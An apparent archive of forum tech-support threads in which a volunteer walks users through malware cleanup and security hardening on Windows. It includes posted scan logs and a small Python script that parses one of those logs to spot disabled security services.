  • If you are prompted to Reboot during the cleanup, select Yes.
  • The tool will delete itself once it finishes.
Note: If any tool, file or folder (belonging to the program we have used) hasn't been deleted, please delete it manually.
*************************************************
To set a new Restore Point.

Click the Start button, click Control Panel, click System and Maintenance, and then click System. In the left pane, click System Protection. If you are prompted for an administrator password or confirmation, type the password or provide confirmation. To turn off System Protection for a hard disk, clear the check box next to the disk, and then click OK. Reboot to Normal Mode.
Click the Start button, click Control Panel, click System and Maintenance, and then click System.
In the left pane, click System Protection. If you are prompted for an administrator password or confirmation, type the password or provide confirmation.
To turn on System Protection for a hard disk, select the check box next to the disk, and then click OK.
This will give you a new, clean Restore Point.
****************************************************
Clean out your temporary internet files and temp files.

Download TFC by OldTimer to your desktop.

Double-click TFC.exe to run it.

Note: If you are running on Vista, right-click on the file and choose Run As Administrator

TFC will close all programs when run, so make sure you have saved all your work before you begin.

* Click the Start button to begin the cleaning process.
* Depending on how often you clean temp files, execution time should be anywhere from a few seconds to a minute or two.
* Please let TFC run uninterrupted until it is finished.

Once TFC is finished it should restart your computer. If it does not, please manually restart the computer yourself to ensure a complete cleaning.
**************************************************
Looking over your log it seems you don't have any evidence of a third party firewall.

Firewalls protect against hackers and malicious intruders. You need to download a free firewall from one of these reliable vendors.

Remember only install ONE firewall

1) Comodo Personal Firewall (Uncheck during installation "Install Comodo SafeSurf..", "Make Comodo my default search provider" and "Make Comodo Search my homepage" and uncheck any HopSurf and/or Ask.com options if you choose this one)
2) Online Armor
3) Agnitum Outpost
4) PC Tools Firewall Plus

If you are using the built-in Windows XP firewall, it is not recommended as it does not block outgoing connections. This means that any malware on your computer is free to "phone home" for more instructions. Simply put, Windows XP contains a mediocre firewall. This firewall is NO replacement for a dedicated software solution. Remember to use only one firewall at the same time.
***************************************************************
Use the Secunia Software Inspector to check for out of date software.

•Click Start Now

•Check the box next to Enable thorough system inspection.

•Click Start

•Allow the scan to finish and scroll down to see if any updates are needed.
•Update anything listed.
.
----------

Go to Microsoft Windows Update and get all critical updates.

----------

I suggest using WOT - Web of Trust. WOT is a free Internet security addon for your browser. It will keep you safe from online scams, identity theft, spyware, spam, viruses and unreliable shopping sites. WOT warns you before you interact with a risky website. It's easy and it's free.

SpywareBlaster- Secure your Internet Explorer to make it harder for ActiveX programs to run on your computer. Also stop certain cookies from being added to your computer when running Mozilla based browsers like Firefox.
* Using SpywareBlaster to protect your computer from Spyware and Malware
* If you don't know what ActiveX controls are, see here

Protect yourself against spyware using the Immunize feature in Spybot - Search & Destroy. Guide: Use Spybot's Immunize Feature to prevent spyware infection in real-time. Note: To ensure you have the latest Immunizations always update Spybot - Search & Destroy before Immunizing. Spybot - Search & Destroy FAQ

Check out Keeping Yourself Safe On The Web for tips and free tools to help keep you safe in the future.

Also see Slow Computer? It may not be Malware for free cleaning/maintenance tools to help keep your computer running smoothly.
Safe Surfing!
Hi SuperDave,

I'm still working through your last instructions and just wanted to Thank You for all your assistance. I really appreciate your time and skilled knowledge.
3270.

Solve : Security service keeps disabling?

Answer»

Quote from: SuperDave on May 27, 2011, 01:24:21 PM

What browser are you using? Try download it with this method.
If you can't access the internet with your infected computer you will have to download and transfer any programs to the computer you're using now and transfer them to the infected computer with a CD-RW or a USB storage device. I prefer a CD because a storage device can get infected. If you use a storage device hold the shift key down while inserting the USB storage device for about 10 secs. You will also have to transfer the logs you receive back to the good computer using the same method until we can get the computer back on-line.

I got it, I think the site was down when I was trying to download it... but I'll run it right now....

Rooter.exe (v1.0.2) by Eric_71
.
SeDebugPrivilege granted successfully ...
.
Windows 7 . (6.1.7601) Service Pack 1
[32_bits] - Intel64 Family 6 Model 23 Stepping 10, GenuineIntel
.
[wscsvc] (Security Center) RUNNING (state:4)
[MpsSvc] RUNNING (state:4)
Windows Firewall -> Enabled
Windows Defender -> Disabled !
User Account Control (UAC) -> Enabled
.
Internet Explorer 9.0.8112.16421
Mozilla Firefox 4.0.1 (en-US)
.
C:\ [Fixed-NTFS] .. ( Total:232 Go - Free:117 Go )
D:\ [CD_Rom]
E:\ [CD_Rom]
F:\ [CD_Rom]
.
Scan : 20:32.44
Path : C:\Users\Jermaine\Desktop\Rooter.exe
User : Jermaine ( Administrator -> YES )
.
----------------------\\ Processes
.
Locked [System Process] (0)
Locked System (4)
______ ??–? (240)
______ ??–? (384)
______ ??–? (456)
______ ??–? (476)
______ ??–? (516)
______ ??–? (560)
______ ??–? (576)
______ ??–? (584)
______ ??–? (700)
______ ??–? (764)
______ ??–? (804)
______ ??–? (868)
______ ??–? (944)
______ ??–? (976)
______ C:\Program Files (x86)\Common Files\logishrd\LVMVFM\UMVPFSrv.exe (1008)
______ ??–? (716)
______ ??–? (1096)
______ ??–? (1164)
______ ??–? (1176)
______ ??–? (1372)
______ ??–? (1396)
______ ??–? (1508)
______ ??–? (1520)
______ ??–? (1568)
______ ??–? (1644)
______ C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe (1764)
______ C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe (1808)
______ ??–? (1880)
______ C:\Program Files (x86)\IObit\Advanced SystemCare 3\AWC.exe (1980)
______ ??–? (2036)
______ C:\Program Files (x86)\TeamViewer\Version6\TeamViewer_Service.exe (1284)
______ ??–? (1260)
______ ??–? (2076)
______ ??–? (2160)
______ ??–? (2168)
______ ??–? (2176)
______ ??–? (2252)
______ C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe (2588)
______ C:\Program Files (x86)\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe (2636)
______ ??–? (2676)
______ ??–? (2960)
______ ??–? (2364)
______ ??–? (2620)
______ C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe (2788)
Locked audiodg.exe (3208)
______ ??–? (2304)
______ ??–? (1960)
______ C:\Windows\SysWOW64\Macromed\Flash\FlashUtil10q_ActiveX.exe (248)
______ ??–? (2416)
______ C:\Users\Jermaine\Desktop\Rooter.exe (2792)
.
----------------------\\ Device\Harddisk0\
.
\Device\Harddisk0 [Sectors : 63 x 512 Bytes]
.
\Device\Harddisk0\Partition1 --[ MBR ]-- (Start_Offset:1048576 | Length:250057064448)
.
----------------------\\ Scheduled Tasks
.
C:\Windows\Tasks\AWC AutoSweep.job
C:\Windows\Tasks\AWC Startup.job
C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
C:\Windows\Tasks\SA.DAT
C:\Windows\Tasks\SCHEDLGU.TXT
.
----------------------\\ Registry
.
.
----------------------\\ Files & Folders
.
C:\Users\Jermaine\Downloads\half-life\Half-Life_CD_Keygen\Half Life CDkeygen.exe
==> Cracks & Keygens <==
.
----------------------\\ Scan completed at 20:32.57
.
C:\Rooter$\Rooter_1.txt - (27/05/2011 | 20:32.57).c
Your computer has keygens, which is a form of software piracy. What is so bad about Cracks, Hacks, Pirated software, warez, or Keygens?

Most popular cracks or keygens I see, are for Adobe CS3, a lot of different games, Nero, Kaspersky antivirus, and much more. All of these cracks and keygens have what is called "cloaked malware," which is a form of spyware or viruses or trojans that hide themselves inside the keygen or crack files. Most hacks for games that come in the form of a program or installer, will also be infected. It is the opportunity for attackers to present a seemingly safe situation where the opportunity to steal something is in play, while the malware infects your system in the process. Yes, it will install what you were looking for, but also allow malware to potentially take control of your computer.

Lastly, it is illegal. I will counsel you that we do not report such incidents. However, it is not good practice to pirate software.
Downloads\half-life\Half-Life_CD_Keygen
**************************************************************
I'd like to scan your machine with ESET OnlineScan

•Hold down Control and click on the following link to open ESET OnlineScan in a new window.
ESET OnlineScan
•Click the button.
•For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
  • Click on to download the ESET Smart Installer. Save it to your desktop.
  • Double click on the icon on your desktop.
•Check
•Click the button.
•Accept any security warnings from your browser.
•Check
•Push the Start button.
•ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
•When the scan completes, push
•Push , and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
•Push the button.
•Push
A log file will be saved here: C:\Program Files\ESET\ESET Online Scanner\log.txt

When I try to use this it tries to update then it says that it "cannot get the update, is proxy configured?"

Never mind, I got it to work, but it didn't find anything... so no log.

Good. If there are no other issues, we can do some cleanup.

To remove all of the tools we used and the files and folders they created do the following:
Double click OTL.exe.
  • Click the CleanUp button.
  • Select Yes when the "Begin cleanup Process?" prompt appears.
  • If you are prompted to Reboot during the cleanup, select Yes.
  • The tool will delete itself once it finishes.
Note: If any tool, file or folder (belonging to the program we have used) hasn't been deleted, please delete it manually.
************************************************************
To set a new Restore Point.

Click the Start button, click Control Panel, click System and Maintenance, and then click System. In the left pane, click System Protection. If you are prompted for an administrator password or confirmation, type the password or provide confirmation. To turn off System Protection for a hard disk, clear the check box next to the disk, and then click OK. Reboot to Normal Mode.
Click the Start button, click Control Panel, click System and Maintenance, and then click System.
In the left pane, click System Protection. If you are prompted for an administrator password or confirmation, type the password or provide confirmation.
To turn on System Protection for a hard disk, select the check box next to the disk, and then click OK.
This will give you a new, clean Restore Point.
******************************************************************
Clean out your temporary internet files and temp files.

Download TFC by OldTimer to your desktop.

Double-click TFC.exe to run it.

Note: If you are running on Vista, right-click on the file and choose Run As Administrator

TFC will close all programs when run, so make sure you have saved all your work before you begin.

* Click the Start button to begin the cleaning process.
* Depending on how often you clean temp files, execution time should be anywhere from a few seconds to a minute or two.
* Please let TFC run uninterrupted until it is finished.

Once TFC is finished it should restart your computer. If it does not, please manually restart the computer yourself to ensure a complete cleaning.
************************************************************
Looking over your log it seems you don't have any evidence of a third party firewall.

Firewalls protect against hackers and malicious intruders. You need to download a free firewall from one of these reliable vendors.

Remember only install ONE firewall

1) Comodo Personal Firewall (Uncheck during installation "Install Comodo SafeSurf..", "Make Comodo my default search provider" and "Make Comodo Search my homepage" and uncheck any HopSurf and/or Ask.com options if you choose this one)
2) Online Armor
3) Agnitum Outpost
4) PC Tools Firewall Plus

If you are using the built-in Windows XP firewall, it is not recommended as it does not block outgoing connections. This means that any malware on your computer is free to "phone home" for more instructions. Simply put, Windows XP contains a mediocre firewall. This firewall is NO replacement for a dedicated software solution. Remember to use only one firewall at the same time.
***************************************************************
Use the Secunia Software Inspector to check for out of date software.

•Click Start Now

•Check the box next to Enable thorough system inspection.

•Click Start

•Allow the scan to finish and scroll down to see if any updates are needed.
•Update anything listed.
.
----------

Go to Microsoft Windows Update and get all critical updates.

----------

I suggest using WOT - Web of Trust. WOT is a free Internet security addon for your browser. It will keep you safe from online scams, identity theft, spyware, spam, viruses and unreliable shopping sites. WOT warns you before you interact with a risky website. It's easy and it's free.

SpywareBlaster- Secure your Internet Explorer to make it harder for ActiveX programs to run on your computer. Also stop certain cookies from being added to your computer when running Mozilla based browsers like Firefox.
* Using SpywareBlaster to protect your computer from Spyware and Malware
* If you don't know what ActiveX controls are, see here

Protect yourself against spyware using the Immunize feature in Spybot - Search & Destroy. Guide: Use Spybot's Immunize Feature to prevent spyware infection in real-time. Note: To ensure you have the latest Immunizations always update Spybot - Search & Destroy before Immunizing. Spybot - Search & Destroy FAQ

Check out Keeping Yourself Safe On The Web for tips and free tools to help keep you safe in the future.

Also see Slow Computer? It may not be Malware for free cleaning/maintenance tools to help keep your computer running smoothly.
Safe Surfing!
Sorry but the issue has still not been resolved. Microsoft Security Essentials is still not monitoring my system, and Windows Defender still doesn't start. This is due to the virus that I got that you helped me remove. It might be the damage that it left, but is there any way I can fix these issues?

Note: When I try to open Windows Defender it gives me the same message as the picture in post #2

Thanks for what you've done but I still need some more help.

I don't have Windows 7 so I've never had a chance to try this.

Open the Windows Update troubleshooter by clicking the Start button, and then clicking Control Panel. In the search box, type troubleshooter, and then click Troubleshooting. Under System and Security, click Fix problems with Windows Update. These errors can happen if your computer runs out of memory while installing an update. If the Windows Update troubleshooter didn't fix the problem, try the following:

•Close all programs, including ones that run in the background, such as firewalls, antispyware software, web accelerators, Internet security or antivirus programs, or proxy servers, and then run Windows update again.

If you turned off your firewall, antivirus, or other security programs, turn them on once the update has been installed. You can restart any other programs you closed, as well. This error will also occur if the system is out of memory.

There is also a program on Windows 7 called Action Center. You can learn more about it by clicking the link.

This problem is because BITS is not running. Here's a link that may help analyze and fix this problem

Fixed!

Steps To fix it according to SuperDave:

1: Remove Viruses
2: Enforce Security
3: Fix Problems

I'm going to add two more steps that I did to completely fix it.

4: After Fixes, Run Windows Defender
5: Uninstall and reinstall Microsoft Security Essentials

And Done, Everything works and I have enforced Security.

Thanks SuperDave for all the help. Hope this will help other people that encounter this problem.

Note: Can a Moderator rename this to "Security Center service keeps disabling"? So it comes up on search engines.

Quote
I'm going to add two more steps that I did to completely fix it.

4: After Fixes, Run Windows Defender
5: Uninstall and reinstall Microsoft Security Essentials

And Done, Everything works and I have enforced Security.
Great. Good moves.
Quote
Can a Moderator rename this to "Security Center service keeps disabling"? So it comes up on search engines.
It's already named although I don't recommend anyone to follow this cleaning guide. It was created for your computer and could have adverse effects on another computer. Also, some programs are very powerful and if not used correctly, could permanently damage a computer.
Quote
Fixed!
I'm curious. Which method in Reply # 22 did the trick so I'll know the next time I encounter this.

Quote
Thanks SuperDave for all the help
You're welcome.

Quote from: SuperDave on May 30, 2011, 04:53:24 PM
Great. Good moves. It's already named although I don't recommend anyone to follow this cleaning guide. It was created for your computer and could have adverse effects on another computer. Also, some programs are very powerful and if not used correctly, could permanently damage a computer. I'm curious. Which method in Reply # 22 did the trick so I'll know the next time I encounter this.
You're welcome.

Actually none of the things mentioned in post #22 (directly) helped, but aided it.

For example, if you didn't get my computer cleaned it wouldn't be able to turn on Windows Defender. And for me to bypass the service issue for Microsoft Security Essentials (telling me it needed a service turned on), I had to reinstall the whole program again. The reinstall probably reinstalled the service Microsoft Security Essentials needed.

Thanks. I will lock this thread. If you need it re-opened, please send me a pm.
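
The Rooter.exe log posted earlier in this thread already showed the symptom (Windows Defender disabled) next to the tool's own "Cracks & Keygens" flag. The following is an added example, not part of the original thread or of Rooter itself: a small triage parser for that log layout. The function names are hypothetical, and the state codes are the `dwCurrentState` values of the Windows `SERVICE_STATUS` structure.

```python
import re

# Excerpt of the Rooter.exe log posted in this thread (trimmed, otherwise verbatim).
SAMPLE_LOG = r"""
[wscsvc] (Security Center) RUNNING (state:4)
[MpsSvc] RUNNING (state:4)
Windows Firewall -> Enabled
Windows Defender -> Disabled !
User Account Control (UAC) -> Enabled
.
----------------------\\ Scheduled Tasks
.
C:\Windows\Tasks\AWC AutoSweep.job
C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
.
----------------------\\ Files & Folders
.
C:\Users\Jermaine\Downloads\half-life\Half-Life_CD_Keygen\Half Life CDkeygen.exe
==> Cracks & Keygens <==
.
"""

# dwCurrentState values from the Windows SERVICE_STATUS structure.
STATE_NAMES = {
    1: "SERVICE_STOPPED", 2: "SERVICE_START_PENDING", 3: "SERVICE_STOP_PENDING",
    4: "SERVICE_RUNNING", 5: "SERVICE_CONTINUE_PENDING",
    6: "SERVICE_PAUSE_PENDING", 7: "SERVICE_PAUSED",
}

SERVICE_RE = re.compile(
    r"^\[(?P<name>[^\]]+)\]\s*(?:\((?P<display>[^)]*)\)\s*)?"
    r"(?P<status>[A-Z_]+)\s*\(state:(?P<code>\d+)\)\s*$")
PROTECTION_RE = re.compile(r"^(?P<name>.+?)\s*->\s*(?P<value>Enabled|Disabled)\b")
SECTION_RE = re.compile(r"^-{5,}\\\\\s*(?P<title>.+?)\s*$")
FLAG_RE = re.compile(r"^==>\s*(?P<label>.+?)\s*<==$")


def parse_rooter_log(text):
    """Split a Rooter-style log into services, protections, sections and flags."""
    report = {"services": {}, "protections": {}, "sections": {}, "flags": []}
    section = None      # title of the section currently being read
    last_entry = None   # most recent entry line, so a flag can point back at it
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line == ".":
            continue
        m = SECTION_RE.match(line)
        if m:
            section = m.group("title")
            report["sections"][section] = []
            last_entry = None
            continue
        m = FLAG_RE.match(line)
        if m:
            # The tool prints its annotation on the line after the flagged path.
            report["flags"].append((m.group("label"), last_entry))
            continue
        if section is None:
            # Header area: service states and protection toggles.
            m = SERVICE_RE.match(line)
            if m:
                report["services"][m.group("name")] = {
                    "display": m.group("display"),
                    "status": m.group("status"),
                    "code": int(m.group("code")),
                }
                continue
            m = PROTECTION_RE.match(line)
            if m:
                report["protections"][m.group("name")] = m.group("value") == "Enabled"
            continue
        report["sections"][section].append(line)
        last_entry = line
    return report


def triage(report):
    """Return findings worth a second look: stopped services, disabled protections, tool flags."""
    findings = []
    for name, svc in report["services"].items():
        if svc["code"] != 4:
            state = STATE_NAMES.get(svc["code"], "unknown state %d" % svc["code"])
            label = "%s (%s)" % (name, svc["display"]) if svc["display"] else name
            findings.append("service not running: %s is %s" % (label, state))
    for name, enabled in report["protections"].items():
        if not enabled:
            findings.append("protection disabled: %s" % name)
    for label, entry in report["flags"]:
        findings.append("tool flag '%s': %s" % (label, entry))
    return findings


if __name__ == "__main__":
    for finding in triage(parse_rooter_log(SAMPLE_LOG)):
        print(finding)
```
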
3271.

Solve : Is patch.exe harmful??

Answer»

Quote from: SuperDave on May 30, 2011, 05:48:05 PM


SpywareBlaster, ThreatFire etc. to catch the spyware and rogues. You should consider keeping SAS and MBAM on your computer. Update them and run them on a regular basis. Here's some good advice.
I do have MBAM and run it weekly. Will keep SAS and check into ThreatFire. Also have SpywareBlaster after my last problem.

How did I get infected?
Will go read right now. This was a first for me....sure don't want it to happen again!

Quote
This was a first for me....sure don't want it to happen again!
If you follow all the directions provided, you should be OK. I will lock this thread. If you need it re-opened, please send me a pm.
3272.

Solve : Adobe flash player security pop up window?

Answer»

I'm getting a pop-up window that says something to the effect of,

"Adobe flash player security.. stopped potentially unsafe operation
Vitamin.networldsmedia.net

Click settings"

Sorry for the incomplete message. I tried to copy and paste the message but it didn't work so I'm going off of memory and what I had typed into my iPhone Google.

Any idea what this is and how I might fix it?

Thanks!
J

One post per question is enough. I'm locking this thread.

3273.

Solve : virus causing programs to be unusable?

Answer»

Results of screen317's Security Check version 0.99.8
Windows XP Service Pack 2
Out of date service pack!!
Internet Explorer 8
``````````````````````````````
Antivirus/Firewall Check:

Windows Firewall Disabled!
Norton 360
```````````````````````````````
Anti-malware/Other Utilities Check:

Malwarebytes' Anti-Malware
Java(TM) 6 Update 13
Out of date Java installed!
Adobe Flash Player 10.0.42.34
Adobe Reader 9.1
Out of date Adobe Reader installed!
Mozilla Firefox (3.5.16) Firefox Out of Date!
````````````````````````````````
Process Check:
objlist.exe by Laurent

Norton ccSvcHst.exe
``````````End of Log````````````





SysProt AntiRootkit v1.0.1.0
by swatkat

******************************************************************************************
******************************************************************************************

No Hidden Processes found

******************************************************************************************
******************************************************************************************
Kernel Modules:
Module Name: SYMEFA.SYS
Service Name: SymEFA
Module Base: F73FD000
Module End: F744C000
Hidden: Yes

Module Name: \SystemRoot\System32\Drivers\dump_atapi.sys
Service Name: ---
Module Base: ED46F000
Module End: ED487000
Hidden: Yes

Module Name: \SystemRoot\System32\Drivers\dump_WMILIB.SYS
Service Name: ---
Module Base: F7BA4000
Module End: F7BA6000
Hidden: Yes

******************************************************************************************
******************************************************************************************
SSDT:
Function Name: ZwConnectPort
Address: 864AC1F8
Driver Base: 0
Driver End: 0
Driver Name: _unknown_

Function Name: ZwCreateThread
Address: 86665478
Driver Base: 0
Driver End: 0
Driver Name: _unknown_

Function Name: ZwLoadDriver
Address: 864427C0
Driver Base: 0
Driver End: 0
Driver Name: _unknown_

Function Name: ZwResumeThread
Address: 8637FA98
Driver Base: 0
Driver End: 0
Driver Name: _unknown_

******************************************************************************************
******************************************************************************************
No Kernel Hooks found

******************************************************************************************
******************************************************************************************
Hidden files/folders:
Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\as1.suitesmart.com\6thElement.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\as1.suitesmart.com\_f5e.swf
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\as1.suitesmart.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\d.yimg.com\static.video.yahoo.com\yep\vyc_player.swf\yep_player.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\d.yimg.com\static.video.yahoo.com\yep\vyc_player.swf
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\d.yimg.com\static.video.yahoo.com\yep\YV_YEP.swf
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\d.yimg.com\static.video.yahoo.com\yep
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\d.yimg.com\static.video.yahoo.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\d.yimg.com\VolumePrefs.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\d.yimg.com\YEPBWPrefs.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\d.yimg.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\e.blip.tv\com.quantserve.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\e.blip.tv
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\flash.quantserve.com\com.quantserve.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\flash.quantserve.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\googleads.g.doubleclick.net\pagead\googleadplayer.swf\mediaPlayerUserSettings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\googleads.g.doubleclick.net\pagead\googleadplayer.swf
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\googleads.g.doubleclick.net\pagead
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\googleads.g.doubleclick.net
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\illumenix.com\StreamMinerInfo.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\illumenix.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\interclick.com\ud.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\interclick.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\l.yimg.com\a\a\1-\flash\promotions\us\general_motors\081113\container.swf\swfCounter.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\l.yimg.com\a\a\1-\flash\promotions\us\general_motors\081113\container.swf
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\l.yimg.com\a\a\1-\flash\promotions\us\general_motors\081113
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\l.yimg.com\a\a\1-\flash\promotions\us\general_motors
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\l.yimg.com\a\a\1-\flash\promotions\us
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\l.yimg.com\a\a\1-\flash\promotions
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\l.yimg.com\a\a\1-\flash
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\l.yimg.com\a\a\1-
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\l.yimg.com\a\a
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\l.yimg.com\a
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\l.yimg.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\login.yahoo.com\loginCache.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\login.yahoo.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\macromedia.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\media.podaddies.com\podaddies_user_data.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\media.podaddies.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\media.scanscout.com\SS_ARE_BrandAdHistory.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\media.scanscout.com\SS_ARE_CampaignHistory.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\media.scanscout.com\SS_ARE_CatFreqHist.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\media.scanscout.com\SS_ARE_DayFreqCap.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\media.scanscout.com\SS_ARE_RPCAdHistory.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\media.scanscout.com\SS_ARE_UserData.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\media.scanscout.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\pic.wretch.cc\e\serv\video\video_player\TransPlayer_20081101.swf\volume.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\pic.wretch.cc\e\serv\video\video_player\TransPlayer_20081101.swf
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\pic.wretch.cc\e\serv\video\video_player
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\pic.wretch.cc\e\serv\video
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\pic.wretch.cc\e\serv
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\pic.wretch.cc\e
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\pic.wretch.cc
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\s.ytimg.com\moduleData.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\s.ytimg.com\soundData.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\s.ytimg.com\videostats.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\s.ytimg.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\skype.com\#ui\preferences.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\skype.com\#ui
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\skype.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\static.youku.com\youkuqplayer.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\static.youku.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\tubemogul.com\InPlayCounts.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\tubemogul.com\PlayerLog.sol
Status: Access denied

